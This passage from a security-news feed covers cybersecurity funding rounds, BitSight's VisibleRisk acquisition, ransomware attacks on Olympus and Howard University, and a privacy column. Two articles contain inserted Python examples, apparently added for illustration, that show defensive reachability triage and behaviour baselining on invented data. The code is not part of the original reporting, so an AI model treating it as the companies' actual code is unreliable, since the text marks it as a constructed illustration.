Meanwhile, BitSight’s purchase of VisibleRisk, a cyber risk ratings joint venture created by Moody’s and Team8, brings in-depth cyber risk assessment capabilities to BitSight’s platform, enabling the startup to better analyze and calculate an organization’s financial exposure to cyber risk. VisibleRisk, which has raised $25 million to date, says its so-called “cyber ratings” are based on cyber risk quantification, which allows companies to benchmark their cyber risk against those of their peers, and to better understand and manage the impact of cyber threats to their businesses.

Following the acquisition, BitSight will also create a risk solutions division focused on delivering a suite of critical solutions and analytics serving stakeholders including chief risk officers, C-suite executives, and boards of directors. This division will be led by VisibleRisk co-founder and CEO Derek Vadala, who previously headed up Moody’s cyber risk group.

Steve Harvey, president and CEO of BitSight, said the company’s partnership with Moody’s and its acquisition of VisibleRisk will expand its reach to “help customers manage cyber risk in an increasingly digital world.”

BitSight was founded in 2011 and has raised a total of $155 million in outside funding, most recently closing a $60 million Series D round led by Warburg Pincus. The startup has just shy of 500 employees and more than 2,300 global customers, including government agencies, insurers and asset managers. 

#articles, #boston, #computer-security, #cyberattack, #cybercrime, #cyberwarfare, #leader, #risk, #risk-analysis, #risk-management, #safety, #security, #team8, #warburg-pincus

Rezilion raises $30M to help security operations teams with tools to automate their busywork

Security operations teams face a daunting task these days, fending off malicious hackers and their increasingly sophisticated approaches to cracking into networks. That also represents a gap in the market: building tools to help those security teams do their jobs. Today, an Israeli startup called Rezilion that is doing just that — building automation tools for DevSecOps, the area of IT that addresses the needs of security teams and the technical work that they need to do in their jobs — is announcing $30 million in funding.

Guggenheim Investments is leading the round with JVP and Kindred Capital also contributing. Rezilion said that unnamed executives from Google, Microsoft, CrowdStrike, IBM, Cisco, PayPal, JP Morgan Chase, Nasdaq, eBay, Symantec, RedHat, RSA and Tenable are also in the round. Previously, the company had raised $8 million.

Rezilion’s funding is coming on the back of strong initial growth for the startup in its first two years of operations.

Its customer base is made up of some of the world’s biggest companies, including two of the “Fortune 10” (the top 10 of the Fortune 500). CEO Liran Tancman, who co-founded Rezilion with CTO Shlomi Boutnaru, said that one of those two is one of the world’s biggest software companies, and the other is a major connected device vendor, but he declined to say which. (For the record, the top 10 includes Amazon, Apple, Alphabet/Google, Walmart and CVS.)

Tancman and Boutnaru had previously co-founded another security startup, CyActive, which was acquired by PayPal in 2015; the pair worked there together until leaving to start Rezilion.

There are a lot of tools out in the market now to help automate different aspects of developer and security operations. Rezilion focuses on a specific part of DevSecOps: large businesses have over the years put in place a lot of processes that they need to follow to try to triage and make the most thorough efforts possible to detect security threats. Today, that might involve inspecting every single suspicious piece of activity to determine what the implications might be.

The problem is that with the volume of information coming in, taking the time to inspect and understand each piece of suspicious activity can put enormous strain on an organization: it’s time-consuming, and as it turns out, not the best use of that time because of the signal-to-noise ratio involved. Typically, each vulnerability can take 6-9 hours to properly investigate, Tancman said. “But usually about 70-80% of them are not exploitable,” meaning they may be bad for some, but not for this particular organization and the code it’s using today. That represents a very inefficient use of the security team’s time and energy.

“Eight out of ten patches tend to be a waste of time,” Tancman said of the approach that is typically taken today. He believes that as its AI continues to grow and its knowledge and solution become more sophisticated, “it might soon be 9 out of 10.”

Rezilion has built a taxonomy and an AI-based system that essentially does that inspection work as a human would do: it spots any new, or suspicious, code, figures out what it is trying to do, and runs it against a company’s existing code and systems to see how and if it might actually be a threat to it or create further problems down the line. If it’s all good, it essentially whitelists the code. If not, it flags it to the team.
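The triage described above comes down to asking whether the code a vulnerability lives in is actually reachable in this deployment. The following is an added illustration of that idea and is not Rezilion’s code: it walks a constructed call graph from the application’s entry points and keeps only findings whose vulnerable symbol can be reached. The call graph, the entry point, the package names and the advisory ids are all constructed placeholders; findings without symbol-level data are reported as “unknown” when their package is loaded, since the graph alone cannot settle them.

```python
"""Reachability-based vulnerability triage (added illustration, not Rezilion's code).

A vulnerability report names a package and, ideally, the function or symbol in
which the flaw lives. If the application never calls that symbol, the finding
is noise for this deployment. The script builds the set of symbols reachable
from the entry points of a constructed application and classifies each finding.
"""
from collections import deque

# Constructed call graph: caller -> callees. Real tooling derives this from
# static analysis or runtime telemetry; the names here are placeholders.
CALL_GRAPH = {
    "app.main": ["app.handle_request", "log.info"],
    "app.handle_request": ["yaml.safe_load", "db.query"],
    "db.query": ["sqlite.execute"],
    "yaml.safe_load": ["yaml.parse"],
    "yaml.load": ["yaml.parse", "yaml.construct_python_object"],
    "log.info": [],
    "yaml.parse": [],
    "yaml.construct_python_object": [],
    "sqlite.execute": [],
    "archive.extract": ["archive.unpack_path"],
    "archive.unpack_path": [],
}

ENTRY_POINTS = ["app.main"]

# Constructed findings with placeholder advisory ids (not real CVE numbers).
FINDINGS = [
    {"id": "ADV-0001", "package": "yaml", "symbol": "yaml.construct_python_object"},
    {"id": "ADV-0002", "package": "archive", "symbol": "archive.unpack_path"},
    {"id": "ADV-0003", "package": "sqlite", "symbol": "sqlite.execute"},
    {"id": "ADV-0004", "package": "log", "symbol": None},  # no symbol-level data
]


def reachable_symbols(graph, entry_points):
    """Breadth-first walk returning every symbol reachable from the entry points."""
    seen = set()
    queue = deque(entry_points)
    while queue:
        node = queue.popleft()
        if node in seen:
            continue
        seen.add(node)
        queue.extend(graph.get(node, []))
    return seen


def triage(findings, graph, entry_points):
    """Classify each finding as 'reachable', 'unreachable' or 'unknown'."""
    reached = reachable_symbols(graph, entry_points)
    loaded_packages = {sym.split(".")[0] for sym in reached}
    result = {}
    for f in findings:
        if f["symbol"] is None:
            # Without symbol-level data we can only say whether the package is used at all.
            result[f["id"]] = "unknown" if f["package"] in loaded_packages else "unreachable"
        elif f["symbol"] in reached:
            result[f["id"]] = "reachable"
        else:
            result[f["id"]] = "unreachable"
    return result


if __name__ == "__main__":
    for adv, verdict in sorted(triage(FINDINGS, CALL_GRAPH, ENTRY_POINTS).items()):
        print(f"{adv}: {verdict}")
```

With the constructed input, only the sqlite finding is reachable; the yaml flaw sits in `yaml.load`, which this application never calls, and the archive package is present but never invoked. The “unknown” verdict is deliberate: a static graph cannot prove a symbol-less advisory harmless, so that finding still needs a human or runtime data.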

The stickiness of the product has come out of how well Tancman and Boutnaru understand the way large enterprises, especially those heavy with technology stacks, operate these days in what has become a very challenging environment for cybersecurity teams.

“They are using us to accelerate their delivery processes while staying safe,” Tancman said. “They have strict compliance departments and have to adhere to certain standards,” in terms of the protocols they take around security work, he added. “They want to leverage DevOps to release that.”

He said Rezilion has generally won over customers in large part for simply understanding that culture and process and helping them work better within that: “Companies become users of our product because we showed them that, at a fraction of the effort, they can be more secure.” This has special resonance in the world of tech, although financial services, and other verticals that essentially leverage technology as a significant foundation for how they operate, are also among the startup’s user base.

Down the line, Rezilion plans to add remediation and mitigation into the mix to further extend what it can do with its automation tools, which is part of where the funding will be going, too, Boutnaru said. But he doesn’t believe it will ever replace the human in the equation altogether.

“It will just focus them on the places where you need more human thinking,” he said. “We’re just removing the need for tedious work.”

In that grand tradition of enterprise automation, then, it will be interesting to watch which other automation-centric platforms might make a move into security alongside the other automation they are building. For now, Rezilion is carving out an interesting enough area for itself to get investors interested.

“Rezilion’s product suite is a game changer for security teams,” said Rusty Parks, senior MD of Guggenheim Investments, in a statement. “It creates a win-win, allowing companies to speed innovative products and features to market while enhancing their security posture. We believe Rezilion has created a truly compelling value proposition for security teams, one that greatly increases return on time while thoroughly protecting one’s core infrastructure.”

#agile-software-development, #alphabet, #amazon, #apple, #articles, #artificial-intelligence, #automation, #ceo, #cisco, #computer-security, #crowdstrike, #cto, #cyactive, #devops, #ebay, #energy, #entrepreneurship, #europe, #financial-services, #funding, #google, #ibm, #jp-morgan-chase, #kindred-capital, #maryland, #microsoft, #paypal, #security, #software, #software-development, #startup-company, #symantec, #technology

Technology giant Olympus hit by BlackMatter ransomware

Olympus said in a brief statement Sunday that it is “currently investigating a potential cybersecurity incident” affecting its European, Middle East and Africa computer network.

“Upon detection of suspicious activity, we immediately mobilized a specialized response team including forensics experts, and we are currently working with the highest priority to resolve this issue. As part of the investigation, we have suspended data transfers in the affected systems and have informed the relevant external partners,” the statement said.

But according to a person with knowledge of the incident, Olympus is recovering from a ransomware attack that began in the early morning of September 8. The person shared details of the incident prior to Olympus acknowledging the incident on Sunday.

A ransom note left behind on infected computers claimed to be from the BlackMatter ransomware group. “Your network is encrypted, and not currently operational,” it reads. “If you pay, we will provide you the programs for decryption.” The ransom note also included a web address to a site accessible only through the Tor Browser that’s known to be used by BlackMatter to communicate with its victims.

Brett Callow, a ransomware expert and threat analyst at Emsisoft, told TechCrunch that the site in the ransom note is associated with the BlackMatter group.

BlackMatter is a ransomware-as-a-service group that was founded as a successor to several ransomware groups, including DarkSide, which recently bounced from the criminal world after the high-profile ransomware attack on Colonial Pipeline, and REvil, which went silent for months after the Kaseya attack flooded hundreds of companies with ransomware. Both attacks caught the attention of the U.S. government, which promised to take action if critical infrastructure was hit again.

Groups like BlackMatter rent access to their infrastructure, which affiliates use to launch attacks, while BlackMatter takes a cut of whatever ransoms are paid. Emsisoft has also found technical links and code overlaps between DarkSide and BlackMatter.

Since the group emerged in June, Emsisoft has recorded more than 40 ransomware attacks attributed to BlackMatter, but the total number of victims is likely to be significantly higher.

Ransomware groups like BlackMatter typically steal data from a company’s network before encrypting it, and later threaten to publish the files online if the ransom to decrypt the files is not paid. Another site associated with BlackMatter, which the group uses to publicize its victims and touts stolen data, did not have an entry for Olympus at the time of publication.

Japan-headquartered Olympus manufactures optical and digital reprography technology for the medical and life sciences industries. The company also built digital cameras and other electronics until it sold its struggling camera division in January.

Olympus said it was “currently working to determine the extent of the issue and will continue to provide updates as new information becomes available.”

Christian Pott, a spokesperson for Olympus, did not respond to emails and text messages requesting comment.

#africa, #colonial-pipeline, #crime, #crimes, #cyberattacks, #cybercrime, #digital-cameras, #electronics, #kaseya, #middle-east, #olympus, #ransomware, #security, #spokesperson, #u-s-government, #united-states

Have ‘The Privacy Talk’ with your business partners

As a parent of teenagers, I’m used to having tough, sometimes even awkward, conversations about topics that are complex but important. Most parents will likely agree with me when I say those types of conversations never get easier, but over time, you tend to develop a roadmap of how to approach the subject, how to make sure you’re being clear, and how to answer hard questions.

And like many parents, I quickly learned that my children have just as much to teach me as I can teach them. I’ve learned that tough conversations build trust.

I’ve applied this lesson about trust-building conversations to an extremely important aspect of my role as the chief legal officer at Foursquare: Conducting “The Privacy Talk.”

The discussion should convey an understanding of how the legislative and regulatory environment is going to affect product offerings, including what’s being done to get ahead of that change.

What exactly is ‘The Privacy Talk’?

It’s the conversation that goes beyond the written, publicly posted privacy policy, and dives deep into a customer, vendor, supplier or partner’s approach to ethics. This conversation seeks to convey and align the expectations that two companies must have at the beginning of a new engagement.

RFIs may ask a lot of questions about privacy compliance, information security, and data ethics. But they are no match for asking your prospective partner to hop on a Zoom to walk you through their broader approach. Unless you hear it first-hand, it can be hard to discern whether a partner is thinking strategically about privacy, whether they are truly committed to data ethics, and how compliance is woven into their organization’s culture.

#column, #digital-advertising, #digital-rights, #ec-column, #ec-how-to, #foursquare, #identity-management, #lawyers, #privacy, #security, #startups, #terms-of-service, #verified-experts

Snyk snags another $530M as valuation rises to $8.4B

Snyk, the Boston-based late-stage startup that is trying to help developers deliver more secure code, announced another mega-round today. This one was for $530 million, with $300 million in new money and $230 million in secondary funding, the latter of which is to help employees and early investors cash in some of their stock options.

The long list of investors includes an interesting mix of public investors, VC firms and strategics. Sands Capital Ventures and Tiger Global led the round, with participation from new investors Baillie Gifford, Koch Industries, Lone Pine Capital, T. Rowe Price and Whale Rock Capital Management. Existing investors also came along for the ride, including Accel, Addition, Alkeon, Atlassian Ventures, BlackRock, Boldstart Ventures, Canaan Partners, Coatue, Franklin Templeton, Geodesic Capital, Salesforce Ventures and Temasek.

This round brings the total raised in funding to $775 million, excluding secondary rounds, according to the company. With secondary rounds, it’s up to $1.3 billion, according to Crunchbase data. The company has been raising funds at a rapid clip (note that the last three rounds include the Snyk money plus secondary rounds):

Snyk's last four funding rounds

While the company wouldn’t share specific revenue figures, it did say that ARR has grown 158% YoY; given the confidence of this list of investors and the valuation, it would suggest the company is making decent money.

Snyk CEO Peter McKay says that the additional money gives him flexibility to make some acquisitions if the right opportunity comes along, what companies often refer to as “inorganic” growth. “We do believe that a portion of this money will be for inorganic expansion. We’ve made three acquisitions at this point and all three have been very, very successful for us. So it’s definitely a muscle that we’ve been developing,” McKay told me.

The company started this year with 400 people and McKay says they expect to double that number by the end of this year. He says that when it comes to diversity, the work is never really done, but it’s something he is working hard at.

“We’ve been able to build a lot of good programs around the world to increase that diversity and our culture has always been inclusive by nature because we’re highly distributed,” he said. He added: “I’m not by any means saying we’re even remotely close to where we want to be. So I want to make that clear. There’s a lot we still have to do.”

McKay says that today’s investment gives him added flexibility to decide when to take the company public because whenever that happens it won’t have to be because they need another fundraising event. “This raise has allowed us to set up with strong, highly reputable public investors, and it gives us the financial resources to pick the timing. We are in control of when we do it and we will do it when it’s right,” he said.

#boston-startups, #developer, #funding, #recent-funding, #sands-capital-ventures, #security, #snyk, #startups, #tiger-global

Thoma Bravo takes a stake in threat intelligence provider Intel 471

Private equity giant Thoma Bravo has taken a stake in Intel 471, a provider of cyber threat intelligence for enterprises and governments.

The strategic growth investment, which comes as organizations double-down on cybersecurity amid a pandemic-fueled rise in cyber threats, will enable Intel 471 to evolve its product suite, broaden its go-to-market strategy and continue to “aggressively pursue innovation,” according to Thoma Bravo. Financial terms of the deal were not disclosed.

Intel 471, a Texas-based firm founded in 2014, takes a preventative approach to cybersecurity. It leverages its access to forums and dark web marketplaces to equip organizations with intelligence and monitoring on threat actors and malware attacks. Using the company’s platform, businesses can track threat actor activity and vulnerability exploits, analyze near-real-time monitoring of malware activity, trace threats that could cause security breaches, and receive alerts on compromised credentials.

“As cybercriminals and their tactics become increasingly sophisticated, our monitoring and intelligence solutions have become mission-critical, with organizations of all sizes looking to us to help them protect against attacks,” said Mark Arena, CEO of Intel 471.

Arena, along with fellow co-founder Jason Passwaters, will continue to lead Intel 471 and will retain a “significant” ownership position.

Thoma Bravo’s investment in Intel 471 sees the private equity firm continue its cybersecurity spending spree. Its recent $12.3 billion purchase of Proofpoint, for example, said to be the largest acquisition in cybersecurity history, trumps Broadcom’s $10.7 billion purchase of Symantec, Intel’s $7.6 billion acquisition of McAfee, and Okta’s proposed $6.5 billion acquisition of Auth0.

Thoma Bravo also previously acquired Sophos for $3.9 billion, took a majority stake in LogRhythm and paid $544 million for authentication startup Imprivata. 

#auth0, #broadcom, #ceo, #computing, #cybercrime, #cyberwarfare, #logrhythm, #mcafee, #security, #security-software, #sophos, #symantec, #technology, #texas, #thoma-bravo

TrueFort snares $30M Series B to expand zero trust application security solution

As companies try to navigate an ever-changing security landscape, it can be challenging to protect everything. Security startup TrueFort has built a zero trust solution focusing on protecting enterprise applications. Today, the company announced a $30 million Series B.

Shasta Ventures led today’s round with participation from new firms Canaan and Ericsson Ventures along with existing investors Evolution Equity Partners, Lytical Ventures and Emerald Development Managers. Under the terms of the agreement, Nitin Chopra, managing director at Shasta Ventures, will be joining the company board. Today’s investment brings the total raised to almost $48 million.

CEO and co-founder Sameer Malhotra says that TrueFort protects customers by analyzing each application and figuring out what normal behavior looks like. Once it understands that, it will flag anything that falls outside of the norm. The company achieves this by gathering data from partners like CrowdStrike and from multiple points within the application and infrastructure.

“Once we get this telemetry, whether it’s networks, endpoints, servers or third party partners, we then help the customer build a picture of what those applications are doing and what’s normal behavior. We then help them baseline that, and monitor that in real time with response and real time controls to continue those applications through their normal life cycle,” he said.

Zero trust is a concept where as a matter of policy you assume that you cannot trust any individual or device until the entity proves it belongs on your systems. Malhotra says that customers are becoming more comfortable with the concept and in 2020 the company saw massive 650% revenue growth.

“We are seeing the demand, especially as zero trust is becoming a more familiar vernacular amongst the security community […]. Again, it’s having the visibility and understanding, and then being able to then reduce it to the limited number of acceptable relationships or executions,” he said. And he believes that it all comes down to understanding your applications and how they operate.
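Reducing an application to “the limited number of acceptable relationships” is, in practice, an allowlist learned from telemetry and then enforced. The following is an added illustration of that baselining approach and is not TrueFort’s code. It learns which (process, destination, port) relationships each application exhibits during an observation window assumed to be clean, then classifies later connection events against that profile, distinguishing a known process talking to a new destination from a process that was never part of the application at all. The telemetry records, application names and hosts are all constructed for the example.

```python
"""Application-behaviour baselining (added illustration; not TrueFort's code).

Learn which (application, process, destination, port) relationships occur during
a trusted observation window, then flag any later connection that falls outside
that allowlist. All telemetry records below are constructed for the example.
"""
from collections import defaultdict

# Constructed telemetry from an observation window assumed to be clean.
BASELINE_WINDOW = [
    {"app": "billing", "proc": "billing-api", "dst": "db.internal", "port": 5432},
    {"app": "billing", "proc": "billing-api", "dst": "db.internal", "port": 5432},
    {"app": "billing", "proc": "billing-api", "dst": "cache.internal", "port": 6379},
    {"app": "billing", "proc": "cron-report", "dst": "smtp.internal", "port": 25},
    {"app": "web", "proc": "nginx", "dst": "billing-api.internal", "port": 8443},
]

# Constructed live events to evaluate against the learned baseline.
LIVE_EVENTS = [
    {"app": "billing", "proc": "billing-api", "dst": "db.internal", "port": 5432},
    {"app": "billing", "proc": "billing-api", "dst": "203.0.113.7", "port": 443},  # new destination
    {"app": "billing", "proc": "sh", "dst": "db.internal", "port": 5432},         # unexpected process
    {"app": "web", "proc": "nginx", "dst": "billing-api.internal", "port": 8443},
]


def learn_baseline(events):
    """Return {app: {(proc, dst, port): count}} observed during the window."""
    baseline = defaultdict(lambda: defaultdict(int))
    for e in events:
        baseline[e["app"]][(e["proc"], e["dst"], e["port"])] += 1
    return baseline


def evaluate(event, baseline):
    """Classify one live event: 'allowed', or a short reason why it deviates."""
    app_profile = baseline.get(event["app"])
    if app_profile is None:
        return "unknown application"
    key = (event["proc"], event["dst"], event["port"])
    if key in app_profile:
        return "allowed"
    known_procs = {proc for proc, _, _ in app_profile}
    if event["proc"] not in known_procs:
        return f"unexpected process {event['proc']!r} for app {event['app']!r}"
    return f"new relationship {event['proc']} -> {event['dst']}:{event['port']}"


def find_anomalies(events, baseline):
    """Return the events that are not in the baseline, paired with the reason."""
    return [(e, verdict) for e in events if (verdict := evaluate(e, baseline)) != "allowed"]


if __name__ == "__main__":
    base = learn_baseline(BASELINE_WINDOW)
    for e, why in find_anomalies(LIVE_EVENTS, base):
        print(f"ALERT {e['app']}/{e['proc']} -> {e['dst']}:{e['port']}: {why}")
```

The counts kept per relationship are what lets a practitioner tune the allowlist before enforcing it: a relationship seen once in the window deserves a second look before it is baked into policy, and the observation window itself must be one you trust, because anything already present when learning starts becomes “normal.”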

TrueFort co-founders Nazario Parsacala and Sameer Malhotra

The company currently has 60 employees with hopes of reaching 85 or 90 by the end of the year. Malhotra says that as they build the employee base, they are driving to make it diverse at every level.

“We look at diversity across our whole management team, all the way from the board down to our different levels. We are quite aggressive in hiring diverse candidates, whether they’re women or LGBTQ or people of color. And we have focused programs where we work with different universities […] to bring on new employees from a diverse talent pool. We also work with different recruiters from that perspective, and our focus is always to look at a different palette and to make sure that we’re as diverse an organization as we can,” he said.

The company was founded in 2015 by Malhotra and his partner Nazario Parsacala, both of whom spent more than 20 years working at big financial services companies — Goldman Sachs and JP Morgan. They worked for a couple of years building the program, launching the first beta in 2017 before bringing the first generally available product to market the following year.

Currently customers can install the solution on-premises or in the cloud of their choice, but the company also has a SaaS solution in the works that will be ready in the next couple of months.

#application-security, #enterprise, #funding, #recent-funding, #security, #shasta-ventures, #startups, #tc, #truefort, #zero-trust

Howard University cancels classes after ransomware attack

Washington, D.C.’s Howard University has canceled classes after becoming the latest educational institution to be hit by a ransomware attack.

The incident was discovered on September 3, just weeks after students returned to campus, when the University’s Enterprise Technology Services (ETS) detected “unusual activity” on the University’s network and intentionally shut it down in order to investigate.

“Based on the investigation and the information we have to date, we know the University has experienced a ransomware cyberattack,” the university said in a statement. While some details remain unclear — it’s unknown who is behind the attack or how much of a ransom was demanded — Howard University said that there is no evidence so far to suggest that personal data of its 9,500 undergraduate and graduate students has been accessed or exfiltrated.

“However, our investigation remains ongoing, and we continue to work toward clarifying the facts surrounding what happened and what information has been accessed,” the statement said.

In order to enable its IT team to fully assess the impact of the ransomware attack, Howard University has canceled Tuesday’s classes, opening its campus to essential employees only. Campus Wi-Fi will also be down while the investigation is underway, though cloud-based software will remain available to students and teachers. 

“This is a highly dynamic situation, and it is our priority to protect all sensitive personal, research and clinical data,” the university said. “We are in contact with the FBI and the D.C. city government, and we are installing additional safety measures to further protect the University’s and your personal data from any criminal ciphering.”

But the university warned that remediation will be “a long haul — not an overnight solution.”

Howard University is the latest in a long line of educational institutions to be hit by ransomware since the start of the pandemic, with the FBI’s Cyber Division recently warning that cybercriminals using this type of attack are focusing heavily on schools and universities due to the widespread shift to remote learning. Last year, the University of California paid $1.14 million to NetWalker hackers after they encrypted data within its School of Medicine’s servers, and the University of Utah paid hackers $457,000 to prevent them from releasing data stolen during an attack on its network. 

According to Emsisoft threat analyst Brett Callow last month, ransomware attacks have disrupted 58 U.S. education organizations and school districts, including 830 individual schools, so far in 2021. Emsisoft estimates that in 2020, 84 incidents disrupted learning at 1,681 individual schools, colleges, and universities.

“We’ll likely see a significant increase in ed sector incidents in the coming weeks,” Callow tweeted on Tuesday.

#california, #cloud-based-software, #crime, #crimes, #cyberattacks, #cybercrime, #federal-bureau-of-investigation, #ransomware, #security, #united-states, #university-of-california, #utah, #washington